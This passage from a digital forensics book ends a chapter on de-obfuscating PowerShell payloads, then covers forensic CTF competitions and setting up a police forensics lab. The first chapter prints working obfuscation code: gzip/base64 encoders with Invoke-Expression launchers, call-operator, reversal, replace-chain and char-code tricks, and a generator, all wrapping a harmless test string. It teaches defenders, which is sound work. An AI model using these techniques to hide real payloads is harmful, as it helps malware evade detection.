System.IO.Compression.GzipStream $memoryS 10 tream, ([System.IO.Compression.CompressionMode]::Compress) 11 $gzipStream.Write($ByteArray, 0, $ByteArray.Length) 12 $gzipStream.Close() 13 $memoryStream.Close() 14 [byte[]]$gzipStream = $memoryStream.ToArray() 15 16 ## Stream Encoder
  • 132. Chapter 5 - De-Obfuscating PowerShell Payloads 125 17 $encodedGzipStream = [System.Convert]::ToBase64String($gzipStream) 18 19 ## Decoder Encoder 20 [System.String]$Decoder = '$decoded = [System.Convert]::FromBase64String("<Base64>") 21 ;$ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length));iex(New-Objec 22 t System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO 23 .Compression.CompressionMode]::Decompress))).readtoend()' 24 [System.String]$Decoder = $Decoder -replace "<Base64>", $encodedGzipStream 25 26 # Launcher 27 $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQCimqV 28 PBILEpJLVICAGWcSyMZAAAA") 29 $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length)) 30 Invoke-Expression (New-Object System.IO.StreamReader(New-Object System.IO.Compressio 31 n.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
  • 133. Chapter 5 - De-Obfuscating PowerShell Payloads 126 Invoke Operator At this point we have found that a common pitfall in obfuscating PowerShell commands is the glaringly obvious usage of the Invoke-Expression cmdlet. This is to be expected because its commonly known purpose is to run supplied expressions. However, this isn’t the only way to directly execute strings. PowerShell supports the usage of what’s called the Invoke Operator, which is seen as & within the scripting language. The behavior of this operator is similar to that of Invoke-Express where it will execute a given string. There is something special about this operator where it has an edge on Invoke-Expression, which is that you can chain call operators in the pipeline. For example, the following three commands are all valid and will return the same thing: 1 PS C:> Get-Service | Where-Object {$_.Status -eq 'Running'} 2 PS C:> Invoke-Expression 'Get-Service' | Where-Object {$_.Status -eq 'Running'} 3 PS C:> & 'Get-Service' | & 'Where-Object' {$_.Status -eq 'Running' Its inclusion in a complex payload can be a little tricky though as it isn’t compatible when used with commands that include parameters. We can put this into perspective with the following example where the first command is valid and the second will throw an error. 1 PS C:> & 'Get-Service' -Name ALG 2 PS C:> & 'Get-Service -Name ALG' 3 & : The term 'Get-Service -Name ALG' is not recognized as the name of a cmdlet Because of this behavior, you’re more than likely to see this being used to obfuscate cmdlets themselves. We can see this in practice by replacing the cmdlets in our compression example from before. 1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL 2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (&'New-Object' System.IO.MemoryS 3 tream($decoded,0,$decoded.Length));&'iex'(&'New-Object' System.IO.StreamReader(&'New 4 -Object' System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMod 5 e]::Decompress))).ReadToEnd()
  • 134. Chapter 5 - De-Obfuscating PowerShell Payloads 127 String Reversing One of the benefits of PowerShell is its ability to interact with and manipulate data, including but not limited to strings. This opens the door to crafting payloads that are confusing to look at, which can be a very effective stall tactic to slow us down from breaking down their payloads. One such tactic that can be deployed is string reversing. This is when the characters of a string are stored in a reverse order, such as the below example. 1 PS C:> $Normal = 'Write-Output "Obfuscated Payload"' 2 PS C:> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW' When we encounter these scenarios, we can typically re-reverse these strings by hand, or program- matically. 1 PS C:> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW' 2 PS C:> iex $((($Reversed.length - 1)..0 | ForEach-Object {$Reversed[$_]}) -join '') 3 Obfuscated Payload These scripts cannot be executed on their own in this format, they have to be placed back in their intended order. Because of this, you’ll typically see logic in place to reverse the string back to its intended order. However, if you don’t see that logic, then the string is likely intended to be reversed.
  • 135. Chapter 5 - De-Obfuscating PowerShell Payloads 128 Replace Chaining Another method that PowerShell can use to manipulate strings is by replacing strings with other values, or removing them entirely. This can be used by using the Replace() method from a System.String object or by using the PowerShell -Replace operator. 1 PS C:> iex('Write-Input "Obfuscated Payload"' -replace "Input","Output") 2 Obfuscated Payload 3 4 PS C:> iex('Write-Input "Obfuscated Payload"'.replace("Input","Output")) 5 Obfuscated Payload It’s a very common practice for us to see payloads that use string replacements, but keep in mind that you could see these replace statements chained in ways that will increase its complexity. 1 PS C:> iex $(iex '''Write-Intup "0bfuscated Payload"''.replace("Input","0utput")'.R 2 eplace('tup','put')).replace("'","").replace('0','O') 3 Obfuscated Payload When dealing with these replace operations, pay very close attention to your integrated development environment (IDE). You look closely, you’ll see that one of the replace statements is the color of a string, which means that in that position, it’s indeed a string and not a method invocation. It’s very common for people to manually do the search and replacements of these, but if you do so out of order, you could inadvertently break the script logic.
  • 136. Chapter 5 - De-Obfuscating PowerShell Payloads 129 ASCII Translation When we view strings we are seeing them in a format that we understand, their character values. These character values also have binary representation of the character that your computer will understand. For example, we know that the ASCII value of the character ‘a’ is 97. To the benefit of some, so does PowerShell out of the box. We can see this understanding directly from the console through type casting. 1 PS C:> [byte][char]'a' 2 97 3 4 PS C:> [char]97 5 a What this allows red teamers to do is to add a level of complexity by replacing any arbitrary character values and convert them into their ASCII derivative. We can see in practice by using our inline base64 expression from before. 1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 2 $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65+[char]1 3 00+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+[char]11 4 9+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[char]66+[ 5 char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char]105+[ch 6 ar]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char]65+[cha 7 r]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char]71+[char 8 ]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]81+[char] 9 65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[char]101 10 +[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[char]81+[ 11 char]66+[char]107+[char]65+[char]67+[char]73+[char]65))))) 12 Obfuscated Payload When you see these types of payloads, be sure to pay close attention to your IDE. If they are not color coded to that of a string, then that means that PowerShell will automatically translate them to their intended value during invocation. You can view their actual value the same way by selecting them and running the selected code.
  • 137. Chapter 5 - De-Obfuscating PowerShell Payloads 130 1 PS C:> $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65 2 +[char]100+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+ 3 [char]119+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[c 4 har]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char 5 ]105+[char]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char 6 ]65+[char]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char] 7 71+[char]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]8 8 1+[char]65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[ 9 char]101+[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[c 10 har]81+[char]66+[char]107+[char]65+[char]67+[char]73+[char]65) 11 VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBk 12 ACIA These types of techniques can also be mix-matched so you’re using a combination of both characters and ASCII values within the same string. 1 PS C:> iex "Write-Output $([char]34+[char]79+[char]98+[char]102+[char]117+[char]115 2 +[char]99+[char]97+[char]116+[char]101+[char]100+[char]32+[char]80+[char]97+[char]12 3 1+[char]108+[char]111+[char]97+[char]100+[char]34)" 4 Obfuscated Payload We can use the following generator as a means to create the above-scenario for practice. 1 $String = 'Write-Output "Obfuscated Payload"' 2 '$(' + (([int[]][char[]]$String | ForEach-Object { "[char]$($_)" }) -join '+') + ')'
  • 138. Chapter 5 - De-Obfuscating PowerShell Payloads 131 Wrapping Up In this chapter we walked through different types of PowerShell obfuscation techniques that are frequently leveraged in the wild and how we can step through them to successfully de-obfuscate them. It is important for us to keep in mind that these are not the only tricks that are available in the obfuscation trade. There are many tricks, both known and unknown to your fellow security researchers in this field that could be used at any time. With practice and experience, you’ll be able to de-obfuscate extremely obfuscated reverse shell payloads, such as this:
  • 139. Chapter 5 - De-Obfuscating PowerShell Payloads 132 One of the best ways to stay ahead of the curve is to ensure that you have a solid understanding of PowerShell. I would recommend that you take a PowerShell programming course if you’re coming into this green. If you have some level of comfort with using PowerShell, I challenge you to use it even more. Find a workflow that’s annoying to do manually and automate it. You can also take some time and even optimize some of your older scripts. Never stop challenging yourself. Go the extra mile, stand up and stand strong. Keep moving forward and you’ll be in a position where you’ll be able to help others grow in the domains that you once found yourself struggling with. Tristram
  • 140. Chapter 6 - Gamification of DFIR: Playing CTFs By Kevin Pagano¹⁴¹ | Website¹⁴² | Twitter¹⁴³ | Discord¹⁴⁴ What is a CTF? The origins of CTF or “Capture The Flag” were found on the playground. It was (still is?) an outdoor game where teams had to run into the other teams’ zones, physically capture a flag (typically a handkerchief), and return it back to their own base without getting tagged by the opposing team. In the information security realm it has come to describe a slightly different competition. Why am I qualified to talk about CTFs? Humble brag time. I’ve played in dozens of CTF competitions and have done pretty well for myself. I am the proud recipient of 3 DFIR Lethal Forensicator coins¹⁴⁵ from SANS, one Tournament of Champions coin (and trophy!), a 3-time winner of Magnet Forensics CTF competitions, a 4-time winner of the BloomCON CTF competition, and a few others. I’ve also assisted in the creation of questions for some CTF competitions as well as creating thorough analysis write-ups of events I’ve competed in on my personal blog¹⁴⁶. ¹⁴¹https://github.com/stark4n6 ¹⁴²https://www.stark4n6.com/ ¹⁴³https://twitter.com/KevinPagano3 ¹⁴⁴http://discordapp.com/users/597827073846935564 ¹⁴⁵https://www.sans.org/digital-forensics-incident-response/coins/ ¹⁴⁶https://ctf.stark4n6.com
  • 141. Chapter 6 - Gamification of DFIR: Playing CTFs 134 Types of CTFs Two of the most common information security types of CTF competitions are “Jeopardy” style and “Attack and Defense” style. “Jeopardy” style typically is a list of questions with varying difficulty and set defined answers. The player or team is given some sort of file or evidence to analyze and then has to find the flag to the question and input it in the proper format to get points. 9.1 - Jeopardy style CTF “Attack and Defense” is more common in Red and Blue Team environments where the Red Team has to hack or attack a Blue Team server. The Blue Team subsequently has to try to protect themselves from the attack. Points can be given for time held or for acquiring specific files from the adversary. 9.2 - Attack and Defense CTF Depending on the CTF, you may see a combination of types, such as “Jeopardy”-style competitions with linear (story-based) elements that leave some questions hidden or locked until a certain prerequisite question is answered. For this chapter, I will go more in-depth regarding the “Jeopardy”-style competitions, more specifically, forensics-geared CTF competitions.
  • 142. Chapter 6 - Gamification of DFIR: Playing CTFs 135 Evidence Aplenty With forensics CTFs, just like in real life, any type of device is game for being analyzed. In the ever- growing landscape of data locations, there are more and more places to look for clues to solve the problems. One of the more well known forensic CTFs is the SANS NetWars¹⁴⁷ tournaments. These are devised with 5 levels with each level being progressively harder than the last. In this competition you will have a chance to analyze evidence from: - Windows computer - macOS computer - Memory/RAM dump - iOS dump - Android dump - Network (PCAP/Netflow/Snort logs) - Malware samples You can see from the above list that you get a well rounded variety of types of evidence that you most likely will see in the field on the job. In other competitions I’ve played you could also come across Chromebooks or even Google Takeout and other cloud resources as they become more common. I have also seen some that are more crypto-based in which you will be working with different ciphers and hashes to determine the answers. ¹⁴⁷https://www.sans.org/cyber-ranges/
  • 143. Chapter 6 - Gamification of DFIR: Playing CTFs 136 Who’s Hosting? As previously mentioned, SANS is probably the most well known provider of a forensics CTF through their NetWars¹⁴⁸ program. It isn’t cheap as a standalone, but is sometimes bundled with one of their training courses. You can sometimes see them hosted for free with other events such as OpenText’s enFuse conference. As for others, Magnet Forensics has been hosting a CTF for the past 5 years in tandem with their User Summit. This has been created by Jessica Hyde in collaboration with some students from Champlain College’s Digital Forensics Association. Some previous Magnet CTFs were also created by Dave Cowen and Matthew Seyer, for context. Other software vendors have started to create their own as well to engage with the community. Cellebrite in the past 2 years has hosted virtual CTF competitions and Belkasoft has created and put out multiple CTFs¹⁴⁹ the last 2 years. DFRWS¹⁵⁰ hosts a yearly forensic challenge with past events covering evidence types such as Playstation 3 dumps, IoT (Internet of Things) acquisitions, mobile malware, and many others. Another fantastic resource for finding other challenges is CyberDefenders¹⁵¹. They host hundreds of various different CTF challenges, from past events and other ones that people have uploaded. You can even contribute your own if you’d like as well as allow them to host your next live event. 9.3 - CyberDefenders website Another fairly exhaustive list of other past challenges and evidence can be found hosted on AboutDFIR¹⁵². ¹⁴⁸https://www.sans.org/cyber-ranges ¹⁴⁹https://belkasoft.com/ctf ¹⁵⁰https://dfrws.org/forensic-challenges/ ¹⁵¹https://cyberdefenders.org/blueteam-ctf-challenges/ ¹⁵²https://aboutdfir.com/education/challenges-ctfs/
  • 144. Chapter 6 - Gamification of DFIR: Playing CTFs 137 Why Play a CTF? So at the end of the day, why should YOU (yes, YOU, the reader) play a CTF? Well, it depends on what you want to get out of it. For Sport Growing up I’ve always been a competitive person, especially playing sports like baseball and basketball, CTFs are no different. There is a rush of excitement (at least for me) competing against other like-minded practitioners or analysts to see how you stack up. You can even be anonymous while playing. Part of the fun is coming up with a creative handle or username to compete under. It also keeps the commentary and your competitors on their toes. I personally like to problem-solve and to be challenged, which is part of the reason I enjoy playing. For Profit I put profit in quotations because many may construe that as a compensation-type objective. While many CTF challenges do have prizes such as challenge coins or swag (awesome branded clothing anyone?!), that’s not completely the profit I’m talking about here. The profit is the knowledge you gain from playing. I’ve done competitions where I never knew how to analyze memory dumps at all and I learned at least the basics of where to look for evidence and new techniques to try later on in real world scenarios. “Commit yourself to lifelong learning. The most valuable asset you’ll ever have is your mind and what you put into it.” - Albert Einstein The knowledge you gain from the “practice” will inevitably help you in the future; it’s just a matter of time. Seriously, you don’t know what you don’t know. Remember when I said you can be anonymous? It doesn’t matter if you get 10 points or 1000 points, as long as you learn something new and have fun while doing so, that’s all that matters.
  • 145. Chapter 6 - Gamification of DFIR: Playing CTFs 138 Toss a Coin in the Tip Jar I get asked all the time, “what are your keys to success playing CTFs?”. That’s probably a loaded question, because there are many factors that can lead to good results. Here, I will break it down into sections that I feel can at least get you started on a path to winning your first CTF. Tips for Playing - Prior First and foremost is the preparation phase. Like any task in life, it always helps to be prepared for the battle ahead. Having a sense of what is to come will help with your plan of attack. Do your research! If you know that a specific person created the CTF then take a look at their social media profiles. Oftentimes they will release hints in some form or fashion, whether it is webinars they have shared or research papers and blog posts they have recently published. Don’t overdo it though, there could be red herrings amok. You can also look at past CTFs they have created to see how questions were formulated before and what sort of locations they tend to lean on for flags. This is part of the reason I personally do write-ups of past CTFs: for future reference. Each CTF’s rules are different, but sometimes teams are allowed reach out to colleagues or others to form a squad. Knowledge from multiple people well-versed in different topics can help in spreading out the workload, especially if there are multiple forms of evidence to be analyzed. I would be remiss if I didn’t say that some of my winning efforts were with team members who helped pick up sections where I wasn’t as strong. Your mileage may vary, though. Make sure to coordinate your efforts with your teammates’ so you do not waste time all working on the same questions. If evidence is provided ahead of the competition, make sure to spend some time getting familiar with it. Process the evidence beforehand so you aren’t wasting time during the live competition waiting on machine time. Some of these events only last 2-3 hours so time is of the essence. This segues right into building out your analysis machine and your toolkit. Make sure that all your system updates are completed prior. The last thing you need is an errant Windows update to take down your system while you watch the spinning.
  • 146. Chapter 6 - Gamification of DFIR: Playing CTFs 139 9.4 - “This will take a while” You may also consider making sure you have local admin access or at least the ability to turn off antivirus (if you are analyzing malware) on your computer. Always do so in a controlled environment if possible, but you knew this already (I hope). If you are provided a toolkit or a trial of a commercial license, use it to your advantage, even if it’s a secondary set of tools. There are times some vendors will make sure that the answer is formulated in a way that their tool will spit out from their own software. Also, commercial tools can potentially speed up your analysis compared to a bunch of free tools, but that is personal preference.
  • 147. Chapter 6 - Gamification of DFIR: Playing CTFs 140 The Toolkit I’m a Windows user through and through so I cannot offer much advice from a Mac or Linux perspective. With that said, I do have some tools that I use from a forensic perspective to analyze those types of evidence. Here are my favorite (free) tools that I use during CTFs: General Analysis - Autopsy¹⁵³ - Bulk Extractor¹⁵⁴ - DB Browser for SQLite¹⁵⁵ - FTK Imager¹⁵⁶ - Hindsight¹⁵⁷ Chromebook - cLEAPP¹⁵⁸ Ciphers - CyberChef¹⁵⁹ - dcode.fr¹⁶⁰ Google Takeout / Returns - RLEAPP¹⁶¹ Mac - mac_apt¹⁶² - plist Editor - iCopyBot¹⁶³ Malware/PE - PEStudio¹⁶⁴ - PPEE (puppy)¹⁶⁵ Memory/RAM - MemProcFS¹⁶⁶ - Volatility¹⁶⁷ ¹⁵³https://www.autopsy.com/ ¹⁵⁴https://github.com/simsong/bulk_extractor ¹⁵⁵https://sqlitebrowser.org/dl/ ¹⁵⁶https://www.exterro.com/ftk-imager ¹⁵⁷https://dfir.blog/hindsight/ ¹⁵⁸https://github.com/markmckinnon/cLeapp ¹⁵⁹https://gchq.github.io/CyberChef/ ¹⁶⁰https://www.dcode.fr/en ¹⁶¹https://github.com/abrignoni/RLEAPP ¹⁶²https://github.com/ydkhatri/mac_apt ¹⁶³http://www.icopybot.com/plist-editor.htm ¹⁶⁴https://www.winitor.com/ ¹⁶⁵https://www.mzrst.com/ ¹⁶⁶https://github.com/ufrisk/MemProcFS ¹⁶⁷https://www.volatilityfoundation.org/releases
  • 148. Chapter 6 - Gamification of DFIR: Playing CTFs 141 Mobile Devices - ALEAPP¹⁶⁸ - Andriller¹⁶⁹ - APOLLO¹⁷⁰ - ArtEx¹⁷¹ - iBackupBot¹⁷² - iLEAPP¹⁷³ Network - NetworkMiner¹⁷⁴ - Wireshark¹⁷⁵ Windows Analysis - Eric Zimmerman tools / KAPE¹⁷⁶ - USB Detective¹⁷⁷ This whole list could be expanded way further but this is the majority of the go-tos in my toolkit. Tips for Playing - During We’ve all been there. You get to a point in the middle of a CTF where you start to struggle. Here are some things to key in on while actually playing. Read the titles of the questions carefully. Often they are riddled with hints about where to look. “Fetch the run time of XXX application.” Maybe you should analyze those Prefetch files over there? Questions will often also tell you how to format your answer submission. This may tell you that the timestamp you’re hunting could be incorrect – those pesky timezone offsets! Did you find a flag that appears to be a password? It’s almost guaranteed that that evidence was placed in such a way that it will be reused. Emails and notes can be a treasure trove for passwords to encrypted containers or files. One thing that may seem silly but can help is to just ask questions. If you’re stumped on a question, talk to the organizer if you can, they may lead you in a direction that you didn’t think of when you set off on a path of destruction. ¹⁶⁸https://github.com/abrignoni/ALEAPP ¹⁶⁹https://github.com/den4uk/andriller ¹⁷⁰https://github.com/mac4n6/APOLLO ¹⁷¹https://www.doubleblak.com/software.php?id=8 ¹⁷²http://www.icopybot.com/itunes-backup-manager.htm ¹⁷³https://github.com/abrignoni/iLEAPP ¹⁷⁴https://www.netresec.com/?page=NetworkMiner ¹⁷⁵https://www.wireshark.org/ ¹⁷⁶https://ericzimmerman.github.io/#!index.md ¹⁷⁷https://usbdetective.com/
  • 149. Chapter 6 - Gamification of DFIR: Playing CTFs 142 9.5 - Don’t Sweat It, Take the Hint Some CTF competitions have a built-in hint system. If they don’t count against your overall score, take them! The chance of a tiebreaker coming down to who used fewer hints is extremely small. If the hint system costs points you will need to weigh the pros and cons of not completing a certain high point question as opposed to losing 5 points for buying that hint. The last tip for playing is to write down your submissions, both the correct and incorrect ones. I can’t tell you the number of times I’ve entered the same answer wrongly into a question to eventually get points docked off my total. This will not only help you during the live CTF but afterwards as well if you write a blog on your walkthroughs.
  • 150. Chapter 6 - Gamification of DFIR: Playing CTFs 143 Strategies There are multiple strategies that you could use for attacking the questions during the competition. Usually they will be broken out into different categories by type of evidence such as Mobile / Computer / Network / Hunt. Some people prefer to try and finish all questions in one section before jumping to the next one. If you’re really good at mobile forensics, for instance, starting with those questions may be a good strategy if you are less experienced in other areas. Another potential strategy depends on how many points the questions are worth. Usually, the more the points, the harder the question. Some people prefer to try to get high-value questions first to put large points on the scoreboard and put the pressure on other competitors. Others prefer to go for the lower point questions first and work their way up. My personal strategy is a combination of them all. I will typically go more towards the easy points first and work my way up from there, but I will jump from different evidence categories once I start to get stuck. Depending on how much pre-work analysis has been done, I may have inferred references to areas that need to be analyzed. I can then look for questions that I may already have answers for. And then there are the ones that are confident (sometimes too confident!). Some players, knowing that they have the answers already, will hold off on submitting for points until very late in the competition to mess with the other competitors. Some CTF competitions will freeze the board the last 15-30 minutes to make the final scores a surprise to all. I would advise against this tactic, but if you’re that confident then by all means. At the end of the day, the right strategy is whatever suits the player the best. “You miss 100% of the shots you don’t take – Wayne Gretzky” – Michael Scott
  • 151. Chapter 6 - Gamification of DFIR: Playing CTFs 144 Takeaways What is it that you can take away from playing a CTF, you ask? You may have different feelings about what you get out of playing CTFs, but here are a few of my personal takeaways. Documentation One of the things I enjoy doing after playing a CTF is to do blog writeups of solutions. If there are questions I didn’t get to finish during the live competition, I have a tendency to go back and revisit to see if I can solve them properly. Once I have a majority of the answers, I will start to write some blogs on how I solved the questions. Not only does this help me document my results for future usage, but it also helps with gaining experience in more technical writing. I can’t tell you the many times that I’ve referenced my own posts in other competitions or in research as I go back to further dive into file system locations that I had never looked at before. Documentation is critical in a lot of aspects of an investigation, so it only makes sense to write down your notes in case you need to reference where a specific artifact came from. The best part is that not all questions will be solved the same. I thoroughly enjoy reading other solvers’ thought processes for getting to the end result. Challenge Yourself & Build Confidence I’m going to stress it again; playing CTFs will help you learn. For those that don’t get to work with some of the different evidence files like Linux or network files, the CTF datasets will give you plenty to take home from analyzing them. Before playing SANS NetWars, I had rarely touched PCAP files let alone knew how to utilize Wireshark to pull out files or specific packets. Learning about Google Takeout exports has given me a new appreciation for what potential evidence can be found in the cloud and what may not be found directly on a mobile device. This has lead to me doing my own research and contributing back to the community in tools like RLEAPP¹⁷⁸ and other open-source projects. These are just a few examples of getting out of your comfort zone and challenging yourself to learn about new tools and techniques. It’s also important to build your confidence. Just because you don’t place well the first time you play doesn’t mean you can’t get better. I know when I started out I struggled in competitions. I didn’t know where to go to find answers or how to get to them. It all comes back to practice. Any athlete will tell you that repetitions of a task will only make you better at that specific task, and it is no different with CTFs and examinations. If you see something often enough, you’ll start seeing patterns like Neo in the Matrix. ¹⁷⁸https://github.com/abrignoni/rleapp
  • 152. Chapter 6 - Gamification of DFIR: Playing CTFs 145 9.6 - “I know kung-fu!” Have Fun! The number one takeaway of playing CTFs is to have fun! These are meant to be a training exercise to stimulate the mind and to give you a break from your normal workload. Don’t stress it, just keep learning. If you’re in person, enjoy the camaraderie of other competitors and build your network. You never know who you may meet while playing and who you will cultivate friendships with in the industry. I hope this chapter breathes new life into you playing CTF competitions. Good luck and see you all out there on the digital battlefields!
  • 153. Chapter 7 - The Law Enforcement Digital Forensics Laboratory Setting Up and Getting Started By Jason Wilkins¹⁷⁹ | Website¹⁸⁰ | Discord¹⁸¹ Executive Cooperation The necessity of executive cooperation When I was approached by my superiors at the police department to establish a Digital Forensics lab, I felt immediately overwhelmed and intimidated, being that I was so new to the field and unsure of my ability to successfully achieve the task. I began scouting the internet for ideas and advice on what tools would be needed and what training I would require. After deciding on the software that we would begin using in our lab, I began the year-long training offered by the company to get certified in their product. It was here that I met my first mentor and really began having my questions answered. He introduced me to the Digital Forensics Discord Server and AboutDFIR.com, and these two tools alone have done so much to reduce the barriers to entry that existed prior to their creation. As I gained confidence in my abilities, and familiarity within the industry, I was more able to approach my executive leadership in a way that facilitated a more professional understanding that would lead to greater cooperation in budgeting and planning. ¹⁷⁹https://twitter.com/TheJasonWilkins ¹⁸⁰https://www.noob2pro4n6.com/ ¹⁸¹http://discordapp.com/users/656544966214025256
  • 154. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 147 To say that Digital Forensics can be expensive, is quite often an understatement. Many law enforcement agencies do not have the budget to even make the attempt. In those cases, they usually depend upon other larger agencies, the state or federal labs, or do not attempt the feat at all. Making your case to executive leadership In these times, every crime contains an aspect of digital evidence. As detectives and prosecutors attempt to add legs to the table of their argument, they are forced to acknowledge the value of Digital Forensics in nearly every case. Most law enforcement executives understand this and will be already amenable to the idea that it would be a great addition to their department. However, anywhere that cost is involved, they will initially resist the eager forensic examiner wishing to purchase every cool toy available. You must be professional, courteous, and extremely patient if you wish to be taken seriously. Create a business plan for the lab that is complete with a section for the present state and future goals. Make a list of tools and training that is needed with prices and a budget for everything. Include the cost of payroll for analysts and use this financial bottom-line strategy to sell the idea to your decision-makers. I would advise caution when using the technique of asking for the world in hopes of blind acceptance. This will do very little to add credibility to your reputation and may hinder you in the future when you need to ask for more. The way that I decided to go was to determine just what was necessary to get started and return to ask for anything more as I encountered roadblocks. Open communication and trust By showing respect and understanding for the position and responsibility of the executive leadership to the tax-paying citizens of our community, I was able to earn their trust and cooperation. I have never received a negative response to any request that I have made. As soon as an obstacle was encountered and a solution was needed that the lab did not already provide for, I made the request and either received the approval for what was needed or was given a timeline of when the funds would be available. Open communication and trust are necessary for any relationship to maintain the integrity and it is no different for professional cooperation than it is for personal connection. Always approach decision makers with respect and then console yourself with patience and faith in their response. As an examiner, you are not always enlightened to all issues of budgetary and sometimes legal or political impact that may affect your request. This is where the trust that you would like to be shown must be reciprocated in kind. By approaching every situation in this way, you will earn the respect and trust of your executive leadership and make your professional life more satisfying in the long run.
  • 155. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 148 Physical Requirements Physical security and accessibility When you begin to create the business plan for the digital forensics lab, you will need to first find a suitable space that will provide physical security and room to accommodate your personnel and equipment. A small department using low-cost and free tools may only require a single examiner, an office with one computer, and a desk. A larger agency may require space for several people, workstations, evidence lockers, and lab equipment. The fact is that you can begin implementing digital forensics in your agency with free tools and existing personnel and hardware. However, you will find yourself running up against obstacles immediately and wanting better solutions. Either way, it is because you are handling evidence that may implicate or exculpate someone of criminal behavior that you need to take security very seriously from the start. Chain of custody and physical access control should be at the forefront of your thoughts throughout the forensic process. At the very least, the lab should be locked when unoccupied and all keyholders accounted for. Digital ID scan access gives accountability and access deniability and is relatively low cost in implementation. Floor plans The floor plan that you decide upon is going to be very distinctly individual to your agency’s needs and capability. However, you should take into account the number of devices that you believe you will be handling, the amount of time that you will have possession of them for storage purposes, and how many people you will have assigned to the lab. If your lab only has one examiner, and only handles a hundred or so mobile devices a year, then you may get by with a space as small as a ten-by-ten office with a desk for your computer, a cabinet or shelves for your devices, and a file cabinet for your case files. As you expand capabilities and personnel, however, you will quickly outgrow that amount of space. With microscopes, faraday cages, and extra workstations, you will require room for the movement of individuals between tables. With a greater number of devices, you will need more room for shelves, charging cabinets, and workflow organization. Mobile devices quickly begin stacking up and becoming disorganized chaos if you do not establish sound workflow processes and case management practices. You need to know which devices are next in line, which are being processed, and which are ready to be returned. If a device is lost while in your custody, it will have serious consequences for yourself, your agency, and most importantly, for the case. Having the space to organize your work properly is therefore of paramount importance. Selecting Tools Network Requirements Your forensic workstations and tools may or may not require a connection to the internet, but when they do, you should at least utilize a dedicated line and/or a virtual private network. Malware can
  • 156. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 149 be transferred from devices to your system and network if you are not careful. Even the forensic software that you have on your workstation can set off alarms in your IT department. Trust me on that one. I speak from experience. It was just that sort of event that convinced my IT director that I needed a dedicated connection. You may find that you need one connection for your forensic workstations and another separate one for your administrative computer. Just be aware of the very real danger to your network that is presented by strange devices. Even a detective bringing you a thumb drive to place evidence on can present an unwary threat. Always practice safe handling of devices when considering making any connections to your system. Selecting forensic workstations This is perhaps the most common question asked when someone first considers getting into digital forensics. What kind of computer is needed for the job? It is also the most fun part for those of us who nerd out over computer specifications and configurations. Boiling it down, you will need great processing power and vast storage. Always refer to the software that you choose first to determine what the minimum and optimal specifications are for that particular tool. I have found that you will basically be building a super gaming computer because of the amount of graphics processing that you will need to accomplish. It is because of this that you may need to convince your superiors that you are not trying to play video games in the lab when you are supposed to be working. That said, I will give you the specifications that I had on my first workstation at the police department. • Dell Precision 5820 Tower X-Series • Intel Core i9-9820X CPU @ 3.30 GHz, 3312 Mhz with 10 cores, 20 logical • Radeon Pro WX 5100 Graphics Card (I wanted an NVIDIA GeForce 3060 at the time) • 128 GB RAM • 1TB SSD (for the Operating System and Program Files) • 2x 4 TB Hard Drives (for File Storage) I wanted an Alienware Aurora desktop, but compromised for the above setup. Never forget that you are asking to spend other people’s money when working in Law Enforcement and you may have to make concessions for that very reason. Always show gratitude and a positive attitude when granted anything. Selecting forensic software I want to preface this section with the acknowledgment that I have made many friends in the field of 